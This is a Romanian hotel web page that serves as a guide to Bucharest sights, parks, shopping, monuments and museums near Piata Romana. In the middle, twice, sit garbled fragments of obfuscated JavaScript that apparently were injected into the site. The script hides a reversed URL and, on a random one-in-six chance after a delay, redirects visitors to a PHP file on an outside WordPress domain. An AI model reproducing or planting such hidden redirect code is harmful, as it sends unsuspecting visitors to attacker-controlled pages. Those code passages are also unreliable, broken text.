Viziteaza Bucuresti!

De ce Bucuresti? Pentru istoria sa, pentru oameni si locuri, pentru arta si arhitectura, restaurante si terase, magazine, centre de afaceri…Un oras dinamic, in evolutie permanenta care va asteapta cu bratele deschise fie ca veniti in scop turistic sau pentru afaceri, in care modernul contrasteaza cu centrul vechi.
Hotelul Duke se afla in centrul orasului, in Piata Romana, foarte aproape de punctele de interes turistic sau de afaceri. Deplasarea catre acestea este facila datorita numeroaselor linii de autobuz si statiei de metrou aflata la 1 minut de hotel. Daca preferati taxi, gasiti in P-ta Romana sau va comandam cu placere chiar in fata hotelului.

Centrul Vechi (5-10 min)

Traieste atmosfera Bucurestiului de odinioara! In Centrul vechi al orasului vei intra intr-o lume diferita, in care istoria este intiparita pe arhitectura deosebita a fiecarei cladiri. Aici puteti vizita monumente istorice impresionante, iar dupa plimbarea pe starzile incarcate cu povesti va puteti bucura de oferta nenumaratelor restaurante si terase pozitionate in aceasta parte a orasului. Daca va place viata de noapte, este locul ideal: pub-uri, terase, discoteci si cluburi!

Ce poti vizita in centrul vechi:

 • Biserica Stavropoleos  

Biserica ortodoxa in stil brancovenesc se afla in centrul istoric al orasului. A fost ridicata in 1724 in timpul domniei lui Nicolae Mavrocordat. Biserica si manastirea au fost construite in curtea hanului sau de catre Ioanichie Stratonikeas, situatie des intalnita in acele vremuri.

 • Biserica Rusa

Biserica Rusa cu hramul Sf. Nicolae a fost construita intre 1905 si 1909 din initiativa ambasadorului rus Ghiers pentru personalul ambasadei si pentru credinciosii rusi din Bucuresti. Interiorul este pictat in stil bizantin iar iconostasul este sculptat in lemn si poleit cu aur. In timpul primului Razboi Mondial lacasul a fost inchis iar obiectele de cult si arhiva au fost trimise la Sankt Petersburg unde s-au pierdut in timpul Revolutiei Ruse

 • Muzeul Curtea Veche- Palatul Voievodal

Curtea Veche este prima curte domneasca din Bucuresti. Nu se cunoaste exact intemeietorul, dar conform opiniilor istoricilor pare a fi construita de catre Mircea cel Batran la sfarsitul secolului al XIV-lea, inceputul secolului al XV-lea. Initial Curtea Domneasca era formata dintr-un palat – Palatul Voievodal, Biserica, saloane de receptie, cancelarii domnesti, grajduri si gradini. A devenit nefunctionala dupa incendiul din 1718 care a distrus intregul oras si dupa cutremurul din 1738.

 • Hanul lui Manuc

Important obiectiv turistic si monument istoric, Hanul a fost construit de catre Beiul Moldovei, Manuc, in 1808. Din cauza multiplelor restaurari, arhitectura initiala nu se cunoaste, dar din descrieri de la inceputul secolului al XIX-lea reiese ca avea o sturctura compusa din subsol unde erau amenajate pivnite boltite, parter cu pravalii si saloane si etaj cu odai pentru oaspeti. In curtea interioara exista o gradina cu fantana arteziana si cafenea.
Hanul a gazduit demnitarii care ai purtat negocierile de pace ce aveau sa puna capat razboiului ruso-turc (1806-1812).

 • Palatul  Bancii Nationale a Romaniei

Cladirea a fost realizata de catre Albert Galleron si Cassien Bernard, ambii elevi ai lui Charles Garnier, realizatorul Operei din Paris, dupa principiile arhitecturale ale stilului eclectic de factura academica.

 • Caru’ cu Bere

Berarie celebra din Centrul Vechi deschisa in 1879, loc incarcat de traditie, unde timpul s-a oprit in epoca Micului Paris. Cladire cu picturi murale, vitralii si balustrade sculptate. Simbolul locului este Mos Ghita, pivnicerul care a lucrat zeci de ani la Caru’ cu Bere, coborand de mii de ori cu felinarul in pivnita cu butoaie. Silueta sa strajuieste si astazi balustrada din dreapta.

Parcuri si gradini

 • Parcul Herastrau (15 min)

Este cel mai mare parc din Bucuresti, cu o suprafata de 110 ha, situat in partea de Nord, pe malurile lacului Herastrau. Atractiile parcului sunt dintre cele mai diversificate: cafenele si restaurante, cluburi nautice, plimbari cu vaporasul, expozitii, teatru de vara.

 • Parcul Carol (15 min)

Parcul de pe Dealul Filaretului s-a amenajat dupa planurile arhitectului peisagist elvetian Eduard Redont si a fost ianugurat in 1906 pentru a sarbatori 40 de ani de domnie a regelui Carol I. Pot fi vizitate aici Mausoleul (1962), Fantana George Grigorie Cantacuzino (stil neoclasic 1870), Statuile Gigantii, Monumentul Eroului Necunoscut (adus de la Marasesti in 1991) etc.

 • Gradina Cismigiu (15 min)

Gradina Cismigiu este cea mai veche gradina publica din Bucuresti, cu o suprafata de 16 hectare, asezata in centrul orasului.  Aici exista un loc special, La Cetate, unde se afla ruinele unei manastiri construite de logofatul Vacarescu in 1756 in incinta careia pornea un tunel secret care lega Palatul Cretulescu de malul Dambovitei.

 • Gradina Botanica (20 min)

Infiintata in 1860, in timpul domniei lui Al.I Cuza, Gradina Botanica din Bucuresti este o institutie de cultura, educatie si cercetare. Aici se cultiva si cresc o mare varietate de plante in principal pentru motive stiintifice, dar si pentru placerea si educarea publicului larg.

Shopping

 • Unirea Shopping Center (10 min)
 • Cocor Shopping Center (10 min)
 • Afi Palace Cotroceni (15 min)
 • Calea Victoriei (5 min)
 • B-dul Magheru  (1 min)

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_1516275992965{padding-top: 10px !important;padding-bottom: 10px !important;}”]

Check in: 14:00   |   Check out: 12:00

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_1551176085115{margin-top: 5px !important;margin-bottom: 5px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}” el_class=”important-button”]

Cladiri si monunente importante din Bucuresti

 • Casa Poporului (Palatul Parlamentului) (10 min)

Casa Poporului a intrat de 3 ori in Cartea Recordurilor: este cea mai mare cladire administrativa pentru uz civil ca suprafata din lume, cea mai scump cladire administrativa din lume si cea mai grea cladire din lume.

 • Palatul de Justitie (10 min)

Piatra de temelie a fost pusa de regele Carol I al Romaniei personal  pe 7 octombrie 1890 iar cladirea fost inaugurata la data de 4 octombrie 1895. Partea centrala a cladirii a fost construita in stilul Renasterii Franceze. Deasupra intrarii principale sunt amplasate sase statui alegorice: Atentia, Vigoarea, Legea, Justitia, Elocinta si Adevarul.

 • Palatul Cotroceni (15 min)

Palat construit de Carol I al Romaniei in stil clasic venetian in incinta vechii manastiri incepute de Serban Cantacuzino in 1679 si continuate de Constantin Brancoveanu. Dupa Revolutia romana din 1989 devine resedinta oficiala a Presedintelui Romaniei.

 • Palatul Victoria (Guvernul Romaniei) (5 min)

Cladirea Palatului Victoria a fost inceputa in 1937 si terminata mult mai tarziu, in 1952, fiind grav avariata in timpul bombardamentului din 1944. In timpul perioadei comuniste a fost sediul Ministerului de Externe si al Consiliului de Ministrii, iar dupa 1989 a devenit sediul Guvernului Romaniei.

 • Arcul de Triumf (10 min)

Este unul dintre simbolurile capitalei Bucuresti si conmemoreaza victoria Romaniei dupa Primul Razboi Mondial, la finalul caruia au fost unite aproape toate teritoriile locuite de romani.

 • Cladirea CEC (10 min)

Piatra de temelie a Palatului Casei de Economii si Consemnatiuni a fost pusa la 8 iulie 1897 in prezenta Regelui Carol I al Romaniei si a reginei Elisabeta si a fost terminata in 1900. Pana in 1875 pe acel loc s-a aflat hanul Sfantul Ioan cel Mare, demolat din cauza degradarii. Planurile de constructie au fost realizate de arhitectul Paul Gottereau, cu elemente specifice din arhitectura franceza de la sfarsitul secolului al XIX-lea.

 • Catedrala Patriarhala si Palatul Patriarhiei (10 min)

Palatul Patriarhiei a fost construit de Statul Roman la inceputul secolului al XX-lea, pe locul fostei sali a Adunarii Deputatilor de pe Dealul Mitropoliei. Ansamblul format din Catedrala Patriarhala si Palatul Patriarhiei este asezat pe vatra manastirii „Sfintii Imparati Constantin si Elena” ctitorita de Constantin Voda Serban (1654-1658) si donata Mitropoliei Tarii Romanesti.

 • Universitatea Bucuresti (5 min)

Palatul Univeristatii din Bucuresti se afla in Piata Universitatii si a fost construit in stil neoclasic pe fostul amplasament al Manastitii Sfantul Sava in anul 1857. Corpurile laterale au fost adaugate ulterior intre anii 1912-1926. Cele patru muze care impodobesc fatada cladirii au fost adaugate in 1929 si sunt opera sculptorului  Emil Wilhelm Becker, pentru care a slujit ca model chiar fiica lui, Else.

 • Opera Romana (15 min)

Cladirea Operei Nationale din Bucuresti a fost ridicata in 1953 dupa planurile arhitectului Octav Doicescu. Fatada cladirii are un portic cu trei arcade monumentale impodobite cu statuile a patru muze si doua basoreliefuri, unul care infatiseaza o scena de opera, iar celalalt, zborul unor balerini. In sala de spectacole exista un candelabru cu o suta de brate de cristal aurit.

 • Teatrul National (5 min)

Cladirea initiala a Teatrului National se afla pe Calea Victoriei, dar a fost distrusa aproape in intregime in timpul bombardamentelor din 1944. In 1990 s-a construit pe acel loc Hotelul Novotel care pastreaza parte din fatada fostului Teatru National.
Cladirea actuala se afla in Piata Universitatii si a fost inaugurata in forma ei actual in decembrie 1973. In anii 1980 cladirea a fost remodelata la cererea lui Nicolae Ceausescu.

 • Ateneul (Filarmonica George Enescu) (5 min)

Cladirea simbol a Bucurestiului a fost construita acum 120 de ani dupa planurile arhitectului francez Albert Galleron. Inaugurarea s-a facut la 5 martie 1889. Palatul Ateneului Roman a fost cladit cu banii dintr-o subscriptie publica in urma organizarii unei loterii nationale, apelul adresat cetatenilor sunand ca o chemare populara „Dati un leu pentru Ateneu!”, apel transformat intr-o lectie de unitate si de trezire a constiintei nationale.

Muzee

 • Muzeul de istorie naturala Grigore Antipa (5 min)

Muzeul National de Istorie Naturala „Grigore Antipa” este una dintre cele mai vechi institutii de cercetare a biodiversitatii si de educare si culturalizare a publicului. Multe dintre colectiile aflate aici sunt valori ale tezaurului mondial.

 • Muzeul Taranului Roman (5 min)

Muzeul National al Taranului Roman este un muzeu de arta si traditie populara amplasat in Piata Victoriei din Bucuresti, alaturi de Muzeul de istorie naturala „Grigore Antipa” si de Muzeul de Geologie. Cladirea monument istoric  in stil neo-romanesc , colectiile bogate de obiecte si muzeografia originala i-au adus in anul 1996 trofeul EMYA – European Museum of the Year Award.Muzeul National de Geologie (5 min)
Cladirea impunatoare a muzeului declarata monument de arhitectura a fost construita in stil neo-brancovenesc dupa proiectul arhitectului Victor Stefanescu la inceputul secolului al XX-lea.  Muzeul este ca o carte uriasa care ilustreaza toate ramurile stiintelor geonomice de la formarea plantelor, a mineralelor, a rocilor, a zacamintelor, tectonica globala si pana la evolutia vietii pe Pamant, evolutia omului si interactiunea sa cu Terra.

 • Muzeul National al Satului (15 min)

Muzeul nu este numai o colectie de case traditionale romanesti insirate, ci este un „sat-muzeu”, un sat real cu ulitele, fantanile, pietele lui. Au fost transportate si remontate pe teritoriul muzeului case traditionale, o biserica de lemn din Maramures, cinci mori de vant, o moara de apa, un teasc de ulei, o povarna, o cherhana si alte anexe, precum si monumente de mare originalitate si unicitate

 • Muzeul National George Enescu (Palatul Cantacuzino) (10 min)

Muzeul National „George Enescu” se afla in Palatul Cantacuzino, pe Calea Victoriei, una dintre cele mai frumoase cladiri din Bucuresti, contruita intre 1901 si 1903 de catre Grigore Cantacuzino (fost primar al Capitalei,  prim-ministru si sef al Partidului Conservator).

 • Muzeul National de Arta (Palatul Regal) (5 min)

Palatul  Regal este o cladire monumentala din Bucuresti, aproape de Ateneu, initial centru al puterii monarhice in Romania. Dupa incendiul din 1926 care a distrus corpul central devine necesara inlocuirea ei si se contruieste un palat dupa planurile arhitectului Nicolae Nenciulescu, terminat in 1937. In prezent Palatul gazduieste Muzeul National de Arta al Romaniei.